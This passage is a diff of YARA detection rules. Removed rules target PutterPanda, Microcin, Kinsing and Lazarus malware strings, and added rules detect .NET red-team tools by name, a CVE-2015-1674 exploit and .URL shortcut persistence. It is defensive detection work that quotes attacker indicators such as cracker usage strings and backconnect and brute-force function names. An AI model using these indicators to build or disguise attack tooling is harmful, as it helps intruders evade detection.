-		logic_hash = "8054195f212017fb17953728a7df34645d81c93fee75300e44f467c6aa5efaff"
+		logic_hash = "574a5f1bc1873321042e932ddfd53853e8e06dff3b25f2ad41e6b8aaf150a8b2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
-		hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
-		hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii
-		$s2 = "ssdpsvc.dll" fullword ascii
-		$s3 = "Fail %s " fullword ascii
-		$s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii
-		$s5 = "LsaServiceInit" fullword ascii
-		$s6 = "%-8d Fs %-12s Bs " fullword ascii
-		$s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii
+		$name = "DotNetAVBypass" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Malware_Msupdater_String_In_EXE : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Hexyrunner : FILE
 {
 	meta:
-		description = "MSUpdater String in Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c7da9e1e-3a8d-54b6-b102-0e1095d99cc4"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L133-L156"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "67741b4d-7336-5c88-8f2c-e48c10b187b9"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/bao7uo/HexyRunner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L676-L689"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
-		logic_hash = "2b7a43aee6dbac1bfa7d9e0331cb078394ae78a1ec44c1a4a70a63b38595abe0"
-		score = 50
+		logic_hash = "c55be1fe285358378a98fd1027650dd20dd8cd0aad4dc062df7a0d4538c78c3b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "msupdate.exe" fullword wide
-		$x3 = "msupdater.exe" fullword ascii
-		$x4 = "msupdater32.exe" fullword ascii
-		$x5 = "msupdater32.exe" fullword wide
-		$x6 = "msupdate.pif" fullword ascii
-		$fp1 = "_msupdate_" wide
-		$fp2 = "_msupdate_" ascii
-		$fp3 = "/kies" wide
+		$name = "HexyRunner" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) ) and not ( 1 of ( $fp* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpoffensiveshell : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "917ab081-ee91-5eda-82eb-4731563a1933"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L158-L175"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "f223fb95-9f16-5504-a6ce-de9d75b38eaa"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/darkr4y/SharpOffensiveShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L691-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
-		logic_hash = "09e7da7f2bfbae9252502ea1ea61b612c1af2e4c70508b34e685b46429d4613c"
-		score = 70
+		logic_hash = "36bcae7817eed375e48822a49e6875295ea1037217231a7f9ae88a9b8af95530"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "msupdater.exe" fullword ascii
-		$s1 = "Explorer.exe \"" fullword ascii
-		$s2 = "FAVORITES.DAT" fullword ascii
-		$s4 = "COMSPEC" fullword ascii
+		$name = "SharpOffensiveShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Reconness : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c65b668-52c2-5cd5-ba02-4f190e08d46c"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L177-L200"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a30188e4-d96a-59d0-9f51-d7a7e07b14ba"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/reconness/reconness"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L706-L719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b55072b67543f58c096571c841a560c53d72f01a"
-		logic_hash = "038be28609df0187cbbce0d16fee7c902b742458f1201ff3c0d5fde19acd2c56"
-		score = 70
+		logic_hash = "9cb7a3522bada1c724999058ec4ddfde09b22166f8fb3ba184dfe6bec276cfc5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "msupdate.exe" fullword wide
-		$x1 = "msupdate" fullword wide
-		$s1 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s2 = "Automatic Updates" fullword wide
-		$s3 = "VirtualProtectEx" fullword ascii
-		$s4 = "Invalid parameter" fullword ascii
-		$s5 = "VirtualAllocEx" fullword ascii
-		$s6 = "WriteProcessMemory" fullword ascii
+		$name = "reconness" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) and 4 of ( $s* ) ) or ( 1 of ( $x* ) and all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Tvasion : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9188a14-5c0c-551c-bdca-9f770f42935a"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L202-L236"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "324cddc6-36d9-5670-827e-24e80dcc66a9"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/loadenmb/tvasion"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L721-L734"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
-		logic_hash = "47d75e589d47a39d5a9c9e0047a143074d3d74b5541adf8cb3be968da732a96d"
-		score = 70
-		quality = 83
+		logic_hash = "b6262f751cbb85e702d89e7c5b4efdc8eaf3085101cd7685218ab1e8a2599385"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "winsta0\\default" fullword ascii
-		$s1 = "EXPLORER.EXE" fullword ascii
-		$s2 = "WNetEnumResourceA" fullword ascii
-		$s3 = "explorer.exe" fullword ascii
-		$s4 = "CreateProcessAsUserA" fullword ascii
-		$s5 = "HttpSendRequestExA" fullword ascii
-		$s6 = "HttpEndRequestA" fullword ascii
-		$s7 = "GetModuleBaseNameA" fullword ascii
-		$s8 = "GetModuleFileNameExA" fullword ascii
-		$s9 = "HttpSendRequestA" fullword ascii
-		$s10 = "HttpOpenRequestA" fullword ascii
-		$s11 = "InternetConnectA" fullword ascii
-		$s12 = "Process32Next" fullword ascii
-		$s13 = "Process32First" fullword ascii
-		$s14 = "CreatePipe" fullword ascii
-		$s15 = "EnumProcesses" fullword ascii
-		$s16 = "LookupPrivilegeValueA" fullword ascii
-		$s17 = "PeekNamedPipe" fullword ascii
-		$s18 = "EnumProcessModules" fullword ascii
-		$s19 = "PSAPI.DLL" fullword ascii
-		$s20 = "SPSSSQ" fullword ascii
+		$name = "tvasion" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ibombshell : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b6ce725-6932-5432-acd5-ee3593ac7bd8"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L238-L276"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "02f3272f-8e75-5df4-9052-a315ae202050"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Telefonica/ibombshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L736-L749"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d450935febe5d6db14be1e7694db1d7b9e8fcacf013920e89c7b25659254310"
-		score = 70
+		logic_hash = "30de65328e2e2230eca3a30490e20c2c6d8ac9bdc835ee15d44300a00b801921"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
-		hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
-		hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
-		hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
-		hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
 
 	strings:
-		$x1 = "rz.dat" fullword ascii
-		$s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
-		$s1 = "Internet connect error:%d" fullword ascii
-		$s2 = "Proxy-Authorization:Basic " fullword ascii
-		$s5 = "Invalid url" fullword ascii
-		$s6 = "Create file failed" fullword ascii
-		$s7 = "myAgent" fullword ascii
-		$z1 = "%s%s%d%d" fullword ascii
-		$z2 = "HttpQueryInfo failed:%d" fullword ascii
-		$z3 = "read file error:%d" fullword ascii
-		$z4 = "down file success" fullword ascii
-		$z5 = "kPStoreCreateInstance" fullword ascii
-		$z6 = "Avaliable data:%u bytes" fullword ascii
-		$z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
+		$name = "ibombshell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 300KB and ( ( uint16( 0 ) == 0x5a4d and $x1 and 3 of ( $s* ) ) or ( 3 of ( $s* ) and 4 of ( $z* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Microcin_Sample_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Remoteprocessinjection : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "96e9ac3b-a837-5909-b17b-259d54e0e7fd"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L13-L36"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "f1698cf2-211a-551a-8bc4-4faefcc6106f"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L751-L764"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7eb967035257490db2537ba46fd1f1e378fc33f93e7f65412949e987194a9db"
+		logic_hash = "87d803c361462877f5ebba2a70f611c95b8684fe9f9f747ccf9643fc4e97d9df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49816eefcd341d7a9c1715e1f89143862d4775ba4f9730397a1e8529f5f5e200"
-		hash2 = "a73f8f76a30ad5ab03dd503cc63de3a150e6ab75440c1060d75addceb4270f46"
-		hash3 = "9dd9bb13c2698159eb78a0ecb4e8692fd96ca4ecb50eef194fa7479cb65efb7c"
 
 	strings:
-		$s1 = "e Class Descriptor at (" ascii
-		$s2 = ".?AVCAntiAntiAppleFrameRealClass@@" fullword ascii
-		$s3 = ".?AVCAntiAntiAppleFrameBaseClass@@" fullword ascii
-		$s4 = ".?AVCAppleBinRealClass@@" fullword ascii
-		$s5 = ".?AVCAppleBinBaseClass@@" fullword ascii
+		$name = "RemoteProcessInjection" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 4 of them or pe.imphash ( ) == "897077ca318eaf629cfe74569f10e023" ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_CACTUSTORCH : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8718ef84-be2b-55a6-a4bb-41161548a2b4"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L38-L52"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7b1e3015-fada-592c-b120-20aa12247d32"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L766-L779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99feb3e1672f69c4cf41a100e9ba64421fd75c3554306a1bf1475da6f1e14ed1"
+		logic_hash = "51a125a44b5d1e73509bcd29865b26f44a5ee53f6907ee9abffa3eef1bbbdea8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8a7d04229722539f2480270851184d75b26c375a77b468d8cbad6dbdb0c99271"
 
 	strings:
-		$s2 = "[Pause]" fullword ascii
-		$s7 = "IconCache_%02d%02d%02d%02d%02d" fullword ascii
+		$name = "CACTUSTORCH" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_3 : FILE
-{
-	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "daecdfe3-e78c-55ee-83a3-3cee8cb9bb5f"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L54-L68"
+rule SIGNATURE_BASE_HKTL_NET_NAME_Pandasniper : FILE
+{
+	meta:
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "006400fb-7e6d-563b-ba78-17937983c9ba"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/QAX-A-Team/PandaSniper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L781-L794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf1227460f1fc4a7bede853b0d4f15b520db870ac7ce2e6684dc195ea6322e82"
+		logic_hash = "c5a32f22a429777186d88f3fcfa79ad4d971e86ebd6117df74aae19728c6addd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f74a3b67c5ed6f38f08786f1601214412249fe128f12c51525135710d681e1d"
 
 	strings:
-		$x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii
-		$s2 = "test, Version 1.0" fullword wide
+		$name = "PandaSniper" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Xbapappwhitelistbypasspoc : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a6a0735-422a-5e91-9274-ce55f7bee5d3"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L70-L90"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b05253ce-cba4-531d-8f39-d8fae71b114d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L796-L809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1293fbd1a6b440168bb1d7b250df0c8a1a7f99a7fb603a6abec7fe7ba20cf4f5"
+		logic_hash = "3c79b70d3a72084dff391ba297518c4fe748d35b794278c4edf2d1faa4bd216e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92c01d5af922bdaacb6b0b2dfbe29e5cc58c45cbee5133932a499561dab616b8"
 
 	strings:
-		$s1 = "cmd /c dir /a /s \"%s\" > \"%s\"" fullword wide
-		$s2 = "ini.dat" fullword wide
-		$s3 = "winupdata" fullword wide
-		$f1 = "%s\\(%08x%08x)%s" fullword wide
-		$f2 = "%s\\d%08x\\d%08x.db" fullword wide
-		$f3 = "%s\\u%08x\\u%08x.db" fullword wide
-		$f4 = "%s\\h%08x\\h%08x.db" fullword wide
+		$name = "xbapAppWhitelistBypassPOC" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or 5 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Stagestrike : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cd06f9f7-0ba3-52c9-a814-be1cd53e2e42"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L92-L110"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "e3f9de04-87f6-5b07-b5b0-a26167937fcc"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/RedXRanger/StageStrike"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L811-L824"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18b9b80ad3c27f32c71197f33e5e99742662cf5cf4ed5f83d574d44ba63f8b5f"
+		logic_hash = "99abc2fee732f27ea94c8ce244dc1742ed01a7753adedd7e80226d1e1c8dee4a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e"
 
 	strings:
-		$x1 = "Sorry, you are not fortuante ^_^, Please try other password dictionary " fullword ascii
-		$x2 = "DomCrack <IP> <UserName> <Password_Dic file path> <option>" fullword ascii
-		$x3 = "The password is \"%s\"         Time: %d(s)" fullword ascii
-		$x4 = "The password is \" %s \"         Time: %d(s)" fullword ascii
-		$x5 = "No password found!" fullword ascii
-		$x7 = "Can not found the Password Dictoonary file! " fullword ascii
+		$name = "StageStrike" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them ) or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_6 : FILE
+rule SIGNATURE_BASE_CVE_2015_1674_CNGSYS : CVE_2015_1674 FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		description = "Detects exploits for CVE-2015-1674"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9988723f-a7ca-598f-9a6c-9f3915732117"
-		date = "2017-09-26"
+		id = "1161b395-a19e-5aac-8416-8a4e60aeca37"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L112-L128"
+		reference = "http://www.binvul.com/viewthread.php?tid=508"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_1674.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "280fb17b5ed5ff1c8018e426969f75e18589eabeb2a20e0e623f206e72e8958d"
+		hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
+		logic_hash = "d751ef739a6fb8b0871f92cb4aba21544f444944710407c723f0452dc3b85522"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2015-1674, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbd43e70dc55e94140099722d7b91b07a3997722d4a539ecc4015f37ea14a26e"
-		hash2 = "871ab24fd6ae15783dd9df5010d794b6121c4316b11f30a55f23ba37eef4b87a"
 
 	strings:
-		$s1 = "** ERROR ** %s: %s" fullword ascii
-		$s2 = "TEMPDATA" fullword wide
-		$s3 = "Bruntime error " fullword wide
+		$s1 = "\\Device\\CNG" wide
+		$s2 = "GetProcAddress" fullword ascii
+		$s3 = "LoadLibrary" ascii
+		$s4 = "KERNEL32.dll" fullword ascii
+		$s5 = "ntdll.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Crime_H2Miner_Kinsing : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Local_URL : FILE
 {
 	meta:
-		description = "Rule to find Kinsing malware"
-		author = "Tony Lambert, Red Canary"
-		id = "1cabca0d-7134-517e-b82e-f2b20b4d1c34"
-		date = "2020-06-09"
+		description = "Detects local script usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
+		id = "438d9323-cb6a-5f5d-af71-76692b93436a"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_h2miner_kinsing.yar#L1-L20"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8795f01f4ce85ca37a4e4667a4ee9756dae6af42884cf79830877a5c35a3bd3b"
-		score = 75
+		logic_hash = "e95e5e97760d9b565184c588fdafe8408cdab61959aee5221485df53ef5f51d6"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "-iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT"
-		$s2 = "libpcap"
-		$s3 = "main.backconnect"
-		$s4 = "main.masscan"
-		$s5 = "main.checkHealth"
-		$s6 = "main.redisBrute"
-		$s7 = "ActiveC2CUrl"
-		$s8 = "main.RC4"
-		$s9 = "main.runTask"
+		$file = "URL=file:///" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint32( 0 ) == 0x464C457F ) and filesize > 1MB and all of them
+		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_1 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_SMB_URL : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f195ebf0-d7af-58e8-a544-769a0c8b628b"
-		date = "2017-12-20"
+		description = "Detects remote SMB path for .URL persistence"
